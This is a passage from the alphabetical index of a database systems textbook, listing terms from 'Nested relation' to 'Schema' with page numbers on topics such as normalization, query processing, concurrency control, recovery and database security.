129-130, 139, 141, 164, 195, 208, 235, 237,
408, 422, 428-429, 438, 528-529, 686-687,
694-695, 698, 721, 723, 726, 730, 742-743,
926, 989

Nested relation, 164, 528-529, 532
Nested-loop join, 694-695, 698, 700, 704, 721, 723,

726
nesting, 121, 130, 208, 362, 374, 412, 528
Network, 21-22, 29, 40-41, 43-44, 46-47, 49, 56, 82,

334, 399, 416, 598, 605, 622, 627-628,
630-631, 754, 828, 839, 877-880, 882-883,
885, 887-889, 901-902, 910, 913, 916-919,
924-925, 956, 995-996, 1009-1010, 1043

Network management, 416
Network model, 21, 49, 399
Network security, 47
networking, 878, 1018

data communications and, 878
networks, 27, 42, 44, 47, 588-589, 598, 626-631, 855,

868, 879, 881-882, 902, 924, 930, 958, 988,
1028, 1046

New York Stock Exchange, 955
next(), 469-470, 477-479, 485
Next Page, 679
Nodes, 166-168, 182, 257-258, 266, 336, 422, 427,

437-439, 619, 627, 651-652, 654-660, 662,
664-665, 671, 675-676, 678-679, 706-708,
713-714, 728, 745, 767-768, 800-803,
862-863, 878-879, 881, 887, 915-916, 957,
962, 980

children, 438, 801
descendants, 800
levels, 427, 438, 651-652, 656-658, 665, 675, 678,

803, 862-863
subtree of, 651-652

Noise, 861, 867-868, 962, 966, 995, 1023
reducing, 966

NOR, 30, 74, 98, 213, 259, 386, 401, 497, 519,
530-532, 540, 788, 794, 903, 994

Normal, 61, 152, 170, 350, 509-510, 520, 523-528,
532-533, 535-545, 547-549, 550-552,
558-559, 575, 578-579, 581-584, 586, 591,
742, 826, 869, 950, 989, 1041

Normalization, 16, 56, 64, 350, 508-549, 550, 552,
559-562, 564, 567-568, 572-573, 576-578,
581-586, 737, 741, 988, 1003

normalizing, 529, 531, 541, 548, 584, 1041
Notation, 49, 52, 56, 58, 61-63, 88, 166-167, 169-170,

178, 182, 187, 194, 201-202, 205-206,
210-211, 225-230, 234, 247-248, 253-254,
266-267, 274-275, 284, 306-307, 317,
319-320, 328, 334-340, 344-345, 347-350,
355-356, 364, 377, 380, 386-387, 394-395,
402, 404, 415, 429, 480, 513, 523, 552-553,
579, 600, 706-707, 760, 801, 932-934,
938-940, 968-971, 982, 984, 1050, 1052

null character, 460
NULL pointer, 473, 612, 643, 652
Number class, 6, 30, 54, 112-113, 147, 487-488
Numbers:, 165
Numeric data, 64, 87

O
Object:, 339, 370

oriented programming, 17, 22, 249, 265, 358-359,
367, 380, 411, 476

use an, 33, 45, 106, 204, 405
object classes, 269, 401
object element, 384-385
Object Management Group (OMG), 334
object-oriented, 10-11, 17, 22-23, 28, 33, 45, 53, 84,

106, 249, 259, 265, 320, 334-335, 339-340,
348, 355, 357-360, 367, 371, 380, 411-414,
416, 459, 466, 471, 476, 588, 621, 989,
1024, 1043

requirements analysis, 334
Object-oriented design, 334
Object-oriented model, 33
objects, 10, 17, 22, 24-25, 28, 35, 45, 229-230, 259,

266-271, 277-278, 335-339, 344, 357-365,
367-368, 370-374, 377, 381-383, 386-390,
392-395, 399, 401-407, 409-417, 420, 422,
424, 447, 478-479, 484, 600, 621-622,
854-856, 861-863, 880, 913, 916, 943, 951,
955-964, 966, 982-984, 988, 1024

distance of, 959, 966
grouping, 409-410, 414, 943, 964, 966
manager, 229, 247, 259, 364, 372, 390, 392, 852,

984
script, 424
state of, 360, 390, 996
template, 266, 411
visible, 360-361, 365, 849, 856

ODBC, 45, 56, 105, 471, 485, 500-501, 892-893, 916
Offsets, 1007, 1011
OLAP, 1, 83-84, 106, 1026, 1034-1049
OLTP, 11, 48, 75, 1035
OPEN, 45, 48, 51, 55, 105-106, 393, 455, 458,

462-464, 471, 490-491, 505, 604-605,
613-614, 918, 955, 958

Open addressing, 613-614
Open source, 48, 51, 55, 490-491, 505
Open source software, 51
opening, 312, 495
Operand, 407
Operands, 166, 371, 705-706, 959
Operating system, 14, 17, 38, 46, 55, 329, 332, 334,

491, 594, 628, 740, 750, 769, 812, 857, 882,
887, 909, 920

Operating system (OS), 38, 909
operating systems, 491, 537, 746, 751, 782, 812-813,

835, 863, 922, 998
execution of, 748

Operations, 10-12, 19, 22-23, 26, 28, 30-32, 35, 37,
39-40, 48, 62, 71-72, 75-77, 81, 82, 99-100,
106, 117, 124, 133-134, 148-152, 154-158,
163-169, 171-175, 177, 182-183, 188-190,
193-195, 197, 202-204, 229-230, 245,
265-266, 268, 294-295, 298, 336, 340, 342,
347, 357-360, 365-369, 371-374, 378-380,
386-392, 399-402, 408-409, 411-415, 469,
484, 517-518, 520, 543, 604-606, 624,
630-631, 635, 686-687, 690, 701-709,
711-714, 716, 720-724, 726, 728-730, 738,
748-752, 754-773, 776-777, 780-786,
792-794, 799, 801-804, 811-812, 815-822,
824-825, 829-834, 840-841, 862-863, 918,
943, 952-953, 956-957, 959-961, 978-979,
981-982, 984, 988, 1026, 1031, 1045-1046

operator overloading, 360, 371, 373, 414
Optimistic concurrency control, 797, 806-807
optimization, 18, 22, 39, 45, 55, 61, 82-83, 130, 183,

348, 589, 684-730, 732, 897, 901-903, 918,
920, 924-925, 979, 981-982, 997

search engine, 997, 1027
Optimizer, 39, 183, 684-687, 692-693, 703, 708, 711,

715-721, 723-728, 744-745, 889-890, 907,
918

OR function, 481-482, 551
Oracle:, 478
Orders, 60, 177, 192-193, 196, 243, 464, 672,

723-724, 729, 760, 764, 766, 852, 863, 918,
1037

Orthogonality, 413, 415
OUTPUT, 37, 39-40, 318, 328, 333, 481, 595, 705,

716, 749, 865, 892, 1042, 1059
Overflow, 610, 612-617, 619-621, 629-630, 633-634,

640, 649, 661-663, 680, 754
Overflows, 617, 620, 662, 741, 960
overhead costs, 24-25
Overlap, 20, 842, 997
Overlapping subclasses, 298, 1052
Overloading, 360, 371, 373, 379, 414, 911

P
Packet, 628
packets, 628-629
Padding, 173
page, 2, 421-422, 425, 490, 493, 500, 505, 679, 723,

741, 799-801, 803, 805, 812-815, 823-828,
831, 858-859, 999, 1017-1022, 1024-1025,
1027, 1033

Page numbers, 422, 637
Page tables, 812, 827
pages, 22, 24, 37, 40, 45-46, 140, 276, 333, 420-423,

425, 490-491, 493-494, 504, 594, 637,
740-741, 745, 779, 799-801, 812-814,
823-826, 828, 830, 892, 993-996, 998-999,

1004-1005, 1008, 1011, 1017-1027, 1031
extracting, 1011, 1018
first, 421, 425, 490-491, 493-494, 779, 799-800,

812-814, 825-826, 830, 999, 1021
last, 491, 504, 814, 825-826, 828, 830

Paging, 739, 810, 823-824, 829-831, 835
page replacement, 835

panels, 1023
paper, 55, 81, 244-245, 277, 304, 416, 635, 730, 875,

989, 1032
paragraphs, 993, 1005
Parallel processing, 48, 749, 761, 1046
parallelism, 623, 882
Parameter, 333, 473-474, 479, 481-482, 485, 717,

754, 858-859, 1054, 1056
Parameters, 10, 35, 37-38, 40, 48, 105, 204, 230, 328,

332-333, 379, 406, 456, 465, 468, 472-475,
479, 481, 484, 492-493, 500, 631-632,
717-718, 729, 740, 752, 1004-1005, 1025,
1054-1056

Parent, 36, 50, 221, 245, 256, 346, 428, 435, 437-438,
605, 659-662, 665, 802-803, 871, 986

Parent class, 346
Parity, 623-626
Parity bits, 624-625
Parser, 684, 705, 708
Parsing, 684-685, 1008, 1025
Partitioning, 410, 637, 668, 674, 695, 699-701,

741-742, 861, 895, 910, 914, 921, 923,
1044-1045

Pascal, 17, 612
Passing, 46, 359-360, 848, 859
Password, 283, 458, 460, 466-467, 473, 477-478,

501-502, 857, 859, 864, 919
Passwords, 17, 838, 840, 872
Path, 29, 34, 48, 50, 403-404, 406, 410, 413-414,

437-439, 481, 493, 499, 610, 691-693, 727,
800, 802-803, 915, 917, 956-957

Path expression, 404, 410, 438-439
paths, 10, 29, 32, 41, 51, 105, 204, 257, 316, 329,

332-333, 339, 607, 636, 690, 692, 694, 706,
719, 724, 726, 735-736, 915, 950, 1025,
1028, 1047

Pattern, 100, 437-438, 537, 625, 956, 962, 964, 1000,
1007, 1024-1027

Pattern recognition, 962
patterns, 23, 333, 437, 739, 865, 913, 1008-1009,

1018, 1024-1027, 1033, 1047
PEAR, 491, 500-505
Peers, 915, 1028
Perfect, 842, 1014
performance, 15-16, 18, 20, 22, 34-35, 38, 41,

312-317, 331-334, 350, 352, 588-590, 592,
595, 618-619, 622-629, 635, 674-675,
689-690, 723, 733-736, 739-742, 744-746,
776, 781, 798, 805-808, 834, 838, 859, 882,
897, 902, 908-909, 913-914, 929, 961, 1014,
1026, 1028, 1034-1035, 1037, 1042,
1045-1046

Peripherals, 627
Perl, 424
Permutation, 864
Persistence, 352, 361, 365, 367, 381, 412, 414
Persistent storage, 17, 281, 855, 1046
Personal computer, 2, 27, 591
Personal information, 502, 836, 842-843, 895, 995,

1018
Phantom, 767, 775, 803-806
Phase, 7, 41, 201, 204, 313-321, 328-329, 332-334,

348, 351, 353, 400, 688-689, 695, 700-701,
729, 772, 780-781, 785-789, 795, 797-798,
801, 805-808, 819, 822, 824-829, 832,
907-910, 913, 918, 925, 963, 1042

Phone numbers, 57-58, 239, 277, 377, 742, 1010
PHP, 454, 490-506
Physical data model, 32
Physical design, 7, 203-204, 314-315, 317, 330,

332-333, 348, 350-351, 354-355, 733, 736,
745-746

Physical tables, 741
Picture elements, 965
pipelining, 590, 705, 715, 723-724, 726, 729

strategy, 705, 715
Pivoting, 1039
Pixels, 964-966
Plaintext, 864-866
planning, 23, 46, 626, 685, 886, 962
platters, 591
Point, 11, 18, 31, 57-58, 63, 70, 87, 210-211, 227, 265,

1076

318, 350-351, 355, 369-371, 380-382, 388,
392, 403-404, 406, 411, 460, 509, 583, 600,
606, 617, 627, 658, 661, 746, 755-756,
758-759, 811-812, 815-821, 823-824,
826-828, 830, 884-885, 943-944, 947-949,
953-954, 957-959, 977, 988-989, 1020,
1033, 1058

pointer, 49, 362, 462, 472-473, 600, 602-605,
612-614, 616, 618-619, 632, 638-646, 649,
651-663, 665, 668, 671, 673, 677, 703,
802-803, 816, 960

pointers, 22, 332, 603, 614, 616, 619, 622, 634,
636-637, 644-646, 648, 652-662, 665-666,
671, 673, 677-678, 692, 718-719, 725, 804,
960-961, 996, 1028, 1040

point-to-point connections, 627
polygon, 372, 956-957

area, 372, 956-957
polymorphism, 361, 371, 373, 402-403, 414, 416
Port, 302
Position, 9-10, 50, 58, 88, 256-257, 267, 281, 299,

310, 384, 387-388, 409, 416, 418, 440, 462,
464, 469, 479, 587, 601-602, 607, 610,
612-614, 640, 661-662, 713, 826, 956-957,
959, 968-969, 991, 1012-1013, 1015-1016,
1030, 1054

power, 42-43, 92, 102, 115, 164, 177, 189, 212, 216,
365, 481-482, 527, 590, 614, 978,
1034-1035

Precedence, 767-769, 771, 778
Precedence graph, 767-769, 771
Precision, 87-88, 354, 382, 742, 842, 872, 1009, 1011,

1014-1016, 1018, 1029-1030
Predicate, 55, 62, 150, 179, 187, 189, 253-255, 259,

262, 265-266, 274, 672, 744, 804, 806-807,
870, 961, 964, 966, 968-971, 974, 976,
978-981, 986-987

Predicates, 185, 869, 923, 956-957, 959, 961,
968-974, 976-981, 984, 987, 989

Prediction, 957, 961
preferences, 342, 1018, 1023-1024

Documents, 1018, 1023-1024
Measuring, 1018
Search, 1018, 1023-1024

Prefixes, 456, 595, 1009
preprocessor, 459, 468, 471, 491-492
prerequisites, 4, 7, 11-12, 342, 941
presentation layer, 46, 892
Pretty good privacy, 855
Primary index, 610, 637-641, 644-645, 647-651, 675,

677-678, 691, 718, 721-722, 736-737, 741
Primary key, 65-66, 69-70, 72, 74, 76, 80, 86, 89-91,

105, 137, 145-146, 160, 211, 289-297, 300,
354, 400, 435, 515, 519-520, 523-524,
526-533, 538, 543, 545, 547, 638-641,
649-650, 676, 692, 735, 895-896, 947

Primary keys, 66, 69, 80, 289-293, 435, 523-524, 530,
532, 544, 550, 552, 896-897

Prime number, 614
Prime numbers, 866
Primitive, 271, 322, 1024
Primitives, 1022-1023
Print server, 43
Printers, 42-43
Printing, 11, 20, 44, 457, 492, 495-496, 818, 831, 997
Printing press, 997
Priorities, 313, 318, 735, 770, 791
privacy, 80, 836-837, 842-843, 854-855, 860, 863,

867-868, 872-874, 876
audit, 873
medical, 837, 867
right to, 837

privacy issues, 867, 873
private, 278, 379, 628, 837, 855, 865-866, 869-871,

873
Private key, 865-866, 873
Private keys, 865
Privilege, 84, 106, 378, 840, 843-848, 854, 856, 859,

873, 875
Privileges, 106, 836, 838-840, 843-848, 852, 854,

870-875, 883
least, 848

Probing, 695, 700-702, 723
Procedure, 132-133, 137, 288, 299, 325, 370, 441,

481-482, 509-510, 528, 532, 543, 550-551,
561, 573, 581-582, 607, 621, 678, 810, 819,
824-825, 918, 935, 955, 973, 984

Procedures, 19, 23, 28, 46, 48, 62, 119, 287, 319, 344,
400, 480-482, 485, 516, 581-583, 628, 656,

665, 812, 854-855, 859, 870, 893, 916, 918,
934, 955

Process, 3, 5, 11, 17, 30, 35-36, 45, 50, 64, 93, 130,
160, 202, 226, 234, 236, 244, 251, 258-259,
268-270, 301, 309, 313-318, 321-323,
327-329, 340-341, 347-349, 351-353, 355,
426, 428, 476, 483, 523-525, 532, 538, 581,
597-599, 605, 622, 624, 630, 674, 724,
748-749, 761-763, 768, 812-813, 817-818,
830, 832-833, 849, 863-864, 909-912, 914,
916, 922, 973-974, 998-999, 1001-1002,
1005-1006, 1008-1013, 1023-1025,
1028-1029, 1048-1049

states, 205, 340-341, 581, 761, 781, 863-864
Processes, 1, 3, 33, 35, 38, 40, 46, 251-252, 258-259,

274, 313, 328-329, 336, 598, 654, 739-740,
745, 748-749, 769-770, 819, 862, 893, 901,
909, 916, 918, 999

suspended, 740, 749
processing, 1, 7-9, 11-15, 17-18, 20-22, 24-26, 33,

37-38, 40, 42-45, 48, 75, 78, 82-84, 106,
130, 153, 310-312, 314-316, 319, 328, 336,
341, 428, 436, 456-457, 462-463, 484,
494-496, 546, 589, 592, 623, 627, 684-730,
732, 735-737, 747-779, 794, 832, 835,
886-887, 891-893, 901-902, 911, 913, 918,
920-921, 924-926, 979, 981-982, 988-989,
994, 999-1000, 1011-1012, 1018, 1032,
1034-1035, 1044-1046, 1048-1049

processors, 20, 428, 430, 749, 882
Product operation, 97, 124, 158, 160, 189, 702, 711,

714
Production, 23, 244, 311, 930
program, 1, 4, 8-11, 14, 17, 19, 21, 25, 31, 34-35,

40-42, 203, 236, 256-257, 267, 299, 340,
367, 371, 382, 402, 411, 413, 418, 421, 428,
454-481, 483-485, 490-493, 495, 505-506,
545, 590-591, 604-605, 607, 611, 613-614,
632, 634, 774, 861-863, 892, 968, 971, 977,
986, 991, 1021

Program code, 19, 333, 402, 456, 461, 465, 481, 484,
491, 634

Program modules, 455, 480-481
Programmer, 17, 130, 329, 359, 389, 392, 411-412,

455, 458-460, 462-464, 466-467, 472,
479-480, 484, 499-500, 502, 733, 750, 789,
863

Programming, 7, 14, 17-18, 21-22, 35-36, 38, 45-46,
49, 51, 56, 62, 105, 119, 211, 249, 265,
329-331, 334, 358-360, 362-363, 365-367,
371, 394, 402, 411, 416, 428, 454-489,
490-506, 600, 719, 869-870, 924, 968, 975,
989

bugs, 754
object-oriented, 17, 22, 45, 249, 265, 330-331, 334,

358-360, 367, 371, 380, 411, 416, 459,
466, 471, 476, 989

Programming errors, 754
Programming language, 17-18, 21, 35-36, 40, 45, 49,

51, 83, 93, 105, 334, 358-360, 365-367, 373,
394, 411, 440-441, 454-459, 466, 468, 471,
480-481, 484-485, 495, 500, 505, 870, 975

Programs, 3-5, 7-11, 14, 19-21, 24, 27, 31, 33-34,
38-46, 64, 70-71, 203-204, 313-314, 317,
333, 371, 425-426, 441, 454-456, 459, 461,
464, 466-467, 476, 481, 484, 491, 493, 584,
590, 599, 601-604, 607, 748-749, 759, 851,
968, 971, 975-976, 998, 1027, 1045-1046

context of, 590, 892
project management, 1047
Project operation, 97, 152-155, 175, 687, 701, 705,

714-715, 979
Projection, 93, 95, 153, 155, 168-169, 189, 560, 564,

568-569, 675, 696, 708, 711-712, 714-715,
724, 726, 924

Prolog, 62, 549, 585, 968-970, 973, 975, 977, 979,
982, 984, 989

Properties, 2, 10, 12, 48, 65, 204-205, 229, 246, 252,
268-269, 348, 361, 386, 390, 392, 395, 399,
401, 412-414, 427, 478, 509-510, 524-525,
540, 558, 564, 567-569, 573-575, 582-583,
747-748, 758-759, 763, 776-777, 805,
855-856, 866, 958-960, 965, 983, 999-1000,
1014, 1018-1020, 1026-1027

of algorithms, 510
Property, 9, 12, 29, 36, 64-65, 163, 211, 361, 390, 399,

520-522, 525, 533-534, 536, 538, 541-542,
551, 556, 558-569, 573-574, 577, 582-586,
619, 700, 759, 765, 768, 780, 830, 849, 868,

873, 876
Get, 36, 538, 558, 560-561, 566, 765
Set, 29, 36, 64-65, 211, 390, 521, 525, 538,

541-542, 551, 556, 558-562, 564-569,
573-574, 577, 582-586, 780

Property rights, 868, 873, 876
Protocol, 441, 499, 627-629, 772, 780, 785-789, 791,

793, 797-801, 803-807, 811, 813-816, 822,
828-833, 855, 858, 892, 907-911, 913, 916,
919, 921-922

LAN, 628
SSL, 855, 919

protocols, 56, 440-441, 756-757, 759, 767, 771-772,
776, 780-781, 788, 790, 794, 804-807, 810,
831, 855, 916-917, 920, 925

prototyping, 15, 333
Pruning, 723
Pseudocode, 634
Public domain, 311
Public key encryption, 839, 864-866
publications, 416, 863
Publishing, 22, 193, 436

Q
Queries, 4-5, 7-8, 11, 13, 16-17, 21, 23, 26, 35, 37-39,

46, 66, 83, 96-99, 101-102, 105-109,
115-147, 148-149, 154, 166, 168-169,
171-172, 174, 177-178, 181-183, 185,
187-197, 201, 204, 333-334, 353, 400,
402-404, 406-409, 413-415, 448, 455-459,
464-465, 468, 503-504, 506, 666-667, 670,
674-675, 684-687, 691, 715-716, 723,
727-730, 733-740, 742-746, 857, 868,
881-883, 886, 889-890, 892-894, 922, 953,
955-956, 959, 969, 978-980, 982-984, 989,
994, 996-997, 1000-1001, 1006-1008,
1013-1014, 1029-1030, 1039, 1041-1042,
1045-1046

Query, 4, 7, 13-14, 17-18, 21-23, 34, 36-40, 45-46, 48,
50-51, 55, 71, 82-83, 93, 95-104, 107,
117-126, 128-132, 134-137, 141-142,
152-153, 160, 162, 165-169, 174-179,
181-190, 194-195, 198, 245, 329, 348, 359,
365, 402-410, 413, 416, 421, 425, 437,
439-440, 447, 456-457, 461-465, 468-475,
478-480, 482-484, 500-505, 622, 665, 667,
669-670, 672, 684-730, 732, 734-736,
739-740, 742-745, 842-845, 854, 877-879,
881-883, 886, 889-894, 901-907, 915,
918-925, 952-954, 958-959, 963-965, 971,
973-974, 979-982, 985-989, 993-994,
996-1017, 1019-1020, 1022, 1024, 1029,
1031-1032, 1044-1046, 1058-1065

Query:, 118, 129, 152-153, 194, 528, 665, 703, 706,
727, 742, 893, 903, 979, 987

Query compiler, 39, 889-890
Query execution, 18, 166, 183, 685-686, 705-706,

708, 714, 716-717, 728-730, 902, 905
Query language, 7, 13-14, 23, 36, 48, 51, 55, 83,

148-149, 166, 177, 190, 198, 245, 359, 365,
380-381, 402, 413, 437, 684-686, 843, 954,
988, 1006, 1026, 1032

Query optimization, 39, 45, 130, 183, 348, 684-686,
692, 705, 711, 715-716, 724, 726-730, 739,
901-902, 918, 920, 979, 982, 997

Query processing, 17-18, 22, 55, 61, 589, 684-730,
732, 735, 878-879, 891, 901-902, 904, 920,
924-925, 979, 981, 988-989, 996, 999-1000,
1045-1046

Queue, 782-783, 788, 791
priority, 791

Queuing, 624-625, 918
Quick sort, 688
quotation mark, 425
quotation marks, 87, 100

R
Race conditions, 909
RAID, 588, 598, 622-628, 630-631, 635
RAM (random access memory), 590
Range, 14, 88, 150, 178-179, 181, 186-187, 189-190,

211, 348, 350, 352, 403, 405, 424, 439, 611,
630, 666-668, 691, 734, 736-737, 744, 861,
897, 959, 967, 1013, 1018, 1020, 1046,
1054

Range query, 667, 959
READ, 4, 17, 38, 40, 75, 109, 224, 338, 351, 378, 381,

464, 485, 590-591, 593, 595-598, 603, 605,

1077

607-608, 610, 624-625, 629-630, 634,
660-661, 674, 676, 679, 688-690, 698,
700-701, 739, 748-757, 760-764, 766-768,
772-775, 777, 781-789, 792-805, 813-818,
820-822, 828, 831-832, 835, 838, 844, 862,
864, 870, 913, 918, 969-970, 992,
1046-1047, 1054-1056

Read operation, 772, 802, 913
Read uncommitted, 774-775
reading, 11, 75, 598-599, 603-605, 610, 626, 634, 689,

716, 726, 749, 754, 783, 794, 796, 940,
1055

read/write heads, 596
Receiver, 861, 864-866
Record, 4-5, 9-10, 16-19, 21-22, 29-31, 33, 36, 49-50,

56, 75, 80, 109, 132-133, 220, 244, 248,
256, 278, 282-283, 312, 317, 333, 362, 378,
380, 461-463, 472-473, 480, 500-503, 545,
598-617, 619-622, 629-630, 632-634,
636-638, 640-642, 644-646, 648-649,
656-661, 670-671, 673-674, 676-678, 682,
690-695, 698-703, 717-722, 737, 756-758,
782-783, 798-801, 840-841, 911, 940, 947,
950-951, 960, 1006-1007, 1022

recording, 594, 756, 812, 830
Recoverable schedule, 762
Recovery, 14, 18, 20, 24, 39-40, 45, 106, 329, 331,

360, 624, 740, 747-748, 750-751, 754-763,
776, 779, 785, 794, 807-808, 810-835, 840,
868-869, 878, 883, 893, 907-912, 921-922,
925

Recovery manager, 750, 755, 815, 826, 828-829, 881,
907-908

recursion, 171, 968, 980, 989
Redundant disk, 624
Reference, 10, 33, 69, 73, 85, 105, 119, 134, 136,

138-140, 216, 226, 276-277, 291-294, 355,
364, 366-367, 370, 374, 377, 391, 398-399,
401, 404, 406-407, 409, 422, 459, 779, 966,
989

References, 69-70, 76, 85-86, 90, 97, 105, 109,
119-120, 143, 145-146, 160, 178, 214, 270,
292-294, 364, 367-368, 390-391, 399-402,
405, 411, 413, 416, 422, 430, 635, 675, 721,
839, 842, 845, 876, 912, 915, 919, 960,
988-989, 1024, 1062

Reflection, 3
Register, 11, 337-338, 341-342, 396-397, 476, 865
regression, 1046
regular expressions, 1007, 1011
Relation, 9, 55-67, 69-77, 80, 84-85, 89-90, 92-93,

95-97, 102-106, 118-120, 126, 128, 137-139,
148-150, 152-156, 158, 160-167, 169-174,
176, 178-179, 181-182, 184-187, 190,
193-195, 234, 269-270, 289-301, 354, 361,
400, 508-511, 513-548, 550-555, 558-562,
564-570, 572-579, 581-586, 668-671, 676,
684, 687, 693, 701-706, 708, 711-715, 720,
722-726, 738, 843-851, 873-875, 880-881,
894-896, 898-900, 902-904, 921, 923, 925,
945-948, 950, 961, 968-969, 979-980, 983,
985-986, 993, 1019, 1060-1065

Relation schema, 58, 60, 62-65, 69, 75-76, 297, 508,
510-511, 521-528, 530-531, 533, 535-538,
540-546, 551-552, 559-562, 565-568,
573-575, 577-579, 581-582, 584, 849, 860

Relational algebra, 55, 71, 75, 81, 82-83, 92-93, 97,
99, 148-200, 296, 301, 416, 686-687, 690,
704-708, 711, 714, 728, 730, 895, 902-904,
978-979, 987, 989, 996

Relational calculus, 55, 72, 83, 148-200, 301, 506,
706, 708, 968, 971-972, 1058-1059

Relational database, 19, 22, 35, 37, 44, 55-81, 82-85,
107-111, 114, 143-144, 148-149, 160,
191-194, 197, 199-200, 204, 287-308, 309,
353, 368, 381, 399, 412, 415, 417, 421,
435-436, 448-450, 452-453, 485-486, 489,
503, 508-512, 520-521, 524, 528, 537-538,
542, 545, 550-587, 676, 690, 731-732, 824,
835, 874, 927-928, 968-969, 976, 979, 981,
988, 990, 994, 1065

Relational database model, 204, 849
Relational database schema, 37, 56, 66-68, 70-72,

76-78, 84-85, 107-111, 114, 143-144,
191-192, 199-200, 287-289, 293, 301, 305,
441, 448-450, 452-453, 485-486, 489, 507,
508, 511-512, 520, 545, 558-559, 570,
731-732, 874, 876, 927-928, 990

Relational database system, 83

Relational databases, 11, 21-22, 29, 48, 56, 66, 82,
106, 156, 216, 335, 357-419, 427, 435-436,
447, 457, 508-549, 559-562, 564, 567-568,
573, 577-578, 584-585, 622, 746, 894, 924,
945, 981-982, 989

relational expressions, 109, 191
Relational model, 28, 33, 41, 51, 55-57, 61-64, 67, 71,

75-76, 81, 84, 92, 101, 148-149, 153, 177,
188, 197, 285, 287, 294-296, 347, 352,
360-363, 365, 368, 374, 377, 399-400, 412,
414, 457, 526, 851, 872, 979, 982, 996

Relational operators, 71, 188, 190, 195, 714, 728,
981-982

Relations, 9, 28, 56-57, 59, 61-64, 66-67, 69-76,
78-79, 81, 83-85, 91-92, 95-99, 102,
104-107, 109, 128-130, 133, 135-137,
148-149, 154-158, 160-163, 165-167,
171-174, 178, 181-182, 185, 187-190,
193-194, 197, 287, 289-296, 298, 350,
361-362, 380, 459, 508-510, 513-516,
518-520, 523-534, 537-543, 545-547,
558-562, 564, 566-574, 576-579, 581-584,
586, 622, 668, 674, 676, 694, 700, 705-708,
711-714, 723-725, 843-846, 848, 851, 886,
894-895, 898, 901-903, 905, 920, 923-924,
936, 945-950, 958-959, 968, 976, 978-983,
986, 1060

Relationship, 7, 19, 24, 29, 46, 49, 56, 62, 67-68,
70-71, 81, 86, 91, 110-111, 143-145, 183,
197, 199-200, 201-245, 246-286, 287,
289-295, 301-305, 312, 317, 320-325,
336-337, 346, 349, 356, 387, 390-392,
396-402, 404-407, 409, 412, 414-415, 444,
449-450, 452, 508-509, 513-514, 520, 522,
539, 566, 576-578, 622, 731-732, 795, 872,
915, 927-928, 990, 1016-1017, 1050-1052

Relationship set, 214-216, 218, 223, 230, 234, 236,
391, 396-397

Relationships, 5, 18, 21, 23, 26, 28-30, 32, 50, 62, 69,
160, 202, 204-205, 213-220, 222-223,
228-236, 241, 243, 245, 246-249, 256-257,
259-260, 264, 268-269, 271-274, 276, 285,
287, 291-293, 295, 311-312, 320, 322,
324-325, 330, 335-336, 338, 342, 345-348,
355, 360, 376, 386-387, 390-392, 394-395,
398-403, 406-407, 412-413, 421-422, 446,
540, 543, 577, 621-622, 925, 956-957, 967,
970, 1009-1011, 1026, 1052

release, 244, 787-788, 869-870, 908-909
remote computers, 312
removing, 33, 65, 388, 533, 535, 569, 833, 844, 1065
Renaming, 95, 122-123, 154-155, 162, 169-170, 175,

190, 738, 1065
Repeatable read, 774-775
Replacement policies, 751
Replica, 442, 446, 905
Replication, 48, 575, 878, 880, 883, 889, 894,

896-898, 901, 905, 913, 918-921, 924,
1044-1045

reporting, 7, 173, 313, 387, 1037
REQUIRED, 20-21, 37, 45, 67, 82, 89, 93, 96, 98, 107,

124, 141, 169, 177, 190, 234, 283, 291, 293,
310, 328, 330-331, 361-362, 400, 429-430,
516, 596-598, 608, 629, 638, 666, 677-678,
699, 715, 736, 812-813, 815-816, 872, 882,
904-905, 942, 1054-1056

requirements engineering, 355
resetting, 757
Resilience, 915
response time, 13, 312, 314, 316, 332, 625, 716, 739,

747
RESTRICT, 19, 89, 91, 128, 138-139, 150, 437-438,

652, 813, 913, 977
Result table, 715, 1062
retrieving, 92, 169, 189, 409, 440, 459, 462, 468, 485,

505, 606, 614, 622, 684, 693, 736, 749, 913,
948, 980, 992-993, 995-996, 998

Return type, 468, 481
reverse engineering, 301, 344
Reviews, 202, 244, 838, 989
Revoking privileges, 839, 843, 845, 848, 872, 875
Right child, 723
Risk, 344, 875, 1015
Rivest, Ron, 866
ROLAP, 1046, 1048
Role, 2, 11, 25, 35, 46, 58-59, 67, 69, 171, 190,

214-215, 217, 222, 227-229, 234, 236,
242-244, 248, 250, 259, 337, 355, 435, 836,
852-853, 855-856, 872-873, 875-876, 907,

922, 960, 1031
Role-based access control (RBAC), 852, 872
Roles, 45, 51, 59, 67, 202, 214, 217, 224, 235, 838,

852-853, 872
RBAC, 852-853, 872

Rollback, 756, 762-763, 774-775, 793, 795, 814,
816-818, 820, 830-832, 834-835, 948

Roll-up, 1039-1040, 1045
Root, 166, 257, 266, 370, 428, 434, 437-438, 442-446,

500, 651-652, 655-657, 659-662, 665, 703,
706, 714, 725-726, 800-803, 839, 960

Root node, 166, 437, 651-652, 655-657, 660-662, 665,
706, 802-803, 960

Rotation, 398, 593, 596, 943, 958, 966, 1045, 1054
Rotational delay, 596, 598, 625, 629, 631-632,

1054-1056
Rotational latency, 634
Round, 987
Routers, 42, 628
Routing, 25, 283, 590
Row offset, 726
rows, 52, 60, 85, 117, 125, 152, 189, 377, 463-464,

469, 503-504, 562, 668-672, 674, 725-726,
742, 775, 844, 854, 857, 870-872, 880-881

RSA, 866, 874
R-tree, 960
Rule, 19, 91, 117, 119, 129, 132-133, 179-180, 185,

257, 328, 372, 427, 495, 553-554, 557-558,
575, 581, 712-714, 723, 726, 728, 777,
784-785, 801, 849, 930-932, 934-941,
961-962, 968-974, 976-981, 983-984,
986-988, 1004, 1025, 1061

Rules, 19-20, 46, 63-64, 69, 71, 75, 83, 119, 179-180,
183, 185, 189, 194, 222, 255, 264, 268, 270,
350-351, 414, 430, 459, 497, 551-555,
574-575, 579, 582-583, 586, 653, 684, 686,
705-706, 711-715, 723, 728, 736, 782-783,
785-787, 789-790, 795, 800-801, 859, 862,
872-873, 929-934, 936-941, 968-979,
981-987, 989, 1006-1007, 1025-1026, 1045

Run-length encoding, 675
Runtime errors, 484

S
Safe rule, 984
safety, 178, 963, 976-977, 981-982
sampling, 730, 1020
SAP, 886
SAX, 428
scalability, 628, 914-915, 1045
Scaling, 958, 964, 966
Scanner, 684, 705
Scenarios, 203, 318, 336-337, 355
Scene, 12, 14-15, 25, 966
Schedule, 38, 40, 340, 342-343, 759-773, 776-778,

785-789, 791-792, 794, 801-802, 807, 809,
816, 819, 822, 832, 925

Scheduling, 332, 625, 740
response time, 332, 625

Schema, 27-28, 30-35, 37-38, 49-53, 56, 58-60,
62-72, 75-80, 83-87, 89, 91-92, 105-111,
113-114, 115-147, 167, 190-196, 199-200,
